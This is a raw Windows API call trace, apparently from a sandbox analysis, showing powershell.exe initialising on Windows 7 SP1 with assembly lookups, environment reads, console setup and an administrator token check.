	[0331.274] CoTaskMemFree (pv=0x436b10) 
	[0332.116] CoTaskMemAlloc (cb=0x104) returned 0x436b10
	[0332.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.116] CoTaskMemFree (pv=0x436b10) 
	[0332.118] CoTaskMemAlloc (cb=0x104) returned 0x436b10
	[0332.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.118] CoTaskMemFree (pv=0x436b10) 
	[0332.118] CoTaskMemAlloc (cb=0x104) returned 0x436b10
	[0332.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.118] CoTaskMemFree (pv=0x436b10) 
	[0334.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0334.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0334.763] CoTaskMemAlloc (cb=0x104) returned 0x436b10
	[0334.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.763] CoTaskMemFree (pv=0x436b10) 
	[0334.766] CoTaskMemAlloc (cb=0x104) returned 0x436b10
	[0334.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.767] CoTaskMemFree (pv=0x436b10) 
	[0335.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0339.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0340.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0341.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0342.507] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0342.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.508] CoTaskMemFree (pv=0x436d30) 
	[0342.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0342.963] SetErrorMode (uMode=0x1) returned 0x1
	[0342.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cddc0 | out: lpFileInformation=0x1cddc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0342.963] SetErrorMode (uMode=0x1) returned 0x1
	[0344.454] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0344.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.454] CoTaskMemFree (pv=0x436d30) 
	[0344.455] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0344.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.455] CoTaskMemFree (pv=0x436d30) 
	[0344.456] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0344.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.456] CoTaskMemFree (pv=0x436d30) 
	[0344.457] CoCreateGuid (in: pguid=0x1ce188 | out: pguid=0x1ce188*(Data1=0x88b8d0e6, Data2=0x1b84, Data3=0x47b2, Data4=([0]=0x99, [1]=0xa7, [2]=0xdd, [3]=0xce, [4]=0x4a, [5]=0x63, [6]=0x4f, [7]=0x31))) returned 0x0
	[0344.461] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0344.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.461] CoTaskMemFree (pv=0x436d30) 
	[0344.464] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0344.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.464] CoTaskMemFree (pv=0x436d30) 
	[0344.466] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0344.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.466] CoTaskMemFree (pv=0x436d30) 
	[0344.472] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0344.473] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cde30 | out: lpConsoleScreenBufferInfo=0x1cde30) returned 1
	[0344.703] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0344.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cde30 | out: lpConsoleScreenBufferInfo=0x1cde30) returned 1
	[0344.704] GetVersionExW (in: lpVersionInformation=0x1cddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0344.706] GetCurrentProcess () returned 0xffffffffffffffff
	[0344.707] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cde58 | out: TokenHandle=0x1cde58*=0x30c) returned 1
	[0344.710] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdd78 | out: TokenInformation=0x0, ReturnLength=0x1cdd78) returned 0
	[0344.711] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3b71b0
	[0344.711] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x3b71b0, TokenInformationLength=0x4, ReturnLength=0x1cdd78 | out: TokenInformation=0x3b71b0, ReturnLength=0x1cdd78) returned 1
	[0344.713] DuplicateTokenEx (in: hExistingToken=0x30c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cded8 | out: phNewToken=0x1cded8*=0x308) returned 1
	[0344.713] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdd78 | out: TokenInformation=0x0, ReturnLength=0x1cdd78) returned 0
	[0344.713] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3b7290
	[0344.713] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x3b7290, TokenInformationLength=0x4, ReturnLength=0x1cdd78 | out: TokenInformation=0x3b7290, ReturnLength=0x1cdd78) returned 1
	[0344.714] CheckTokenMembership (in: TokenHandle=0x308, SidToCheck=0x2cb0118*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cdee8 | out: IsMember=0x1cdee8) returned 1
	[0344.714] CloseHandle (hObject=0x308) returned 1
	[0344.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0344.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0344.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0344.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.141] CoTaskMemAlloc (cb=0x804) returned 0x1b72f080
	[0345.141] GetConsoleTitleW (in: lpConsoleTitle=0x1b72f080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0345.141] CoTaskMemFree (pv=0x1b72f080) 
	[0345.154] CoTaskMemAlloc (cb=0x804) returned 0x1b72f930
	[0345.154] GetConsoleTitleW (in: lpConsoleTitle=0x1b72f930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0345.401] CoTaskMemFree (pv=0x1b72f930) 
	[0345.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.404] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0345.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0345.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0346.012] SetConsoleCtrlHandler (HandlerRoutine=0x2b168dc, Add=1) returned 1
	[0346.024] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0346.025] CoCreateGuid (in: pguid=0x1cdfd0 | out: pguid=0x1cdfd0*(Data1=0xe250d0a9, Data2=0x1ed1, Data3=0x49b0, Data4=([0]=0x94, [1]=0x83, [2]=0x21, [3]=0xce, [4]=0xa5, [5]=0x8c, [6]=0x47, [7]=0x29))) returned 0x0
	[0346.025] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.025] CoTaskMemFree (pv=0x436d30) 
	[0346.028] WinSqmIsOptedIn () returned 0x0
	[0346.028] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.028] CoTaskMemFree (pv=0x436d30) 
	[0346.029] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.029] CoTaskMemFree (pv=0x436d30) 
	[0346.030] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.030] CoTaskMemFree (pv=0x436d30) 
	[0346.030] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.030] CoTaskMemFree (pv=0x436d30) 
	[0346.030] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.030] CoTaskMemFree (pv=0x436d30) 
	[0346.031] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.031] CoTaskMemFree (pv=0x436d30) 
	[0346.032] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.032] CoTaskMemFree (pv=0x436d30) 
	[0346.032] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.032] CoTaskMemFree (pv=0x436d30) 
	[0346.035] CoTaskMemAlloc (cb=0x104) returned 0x436d30
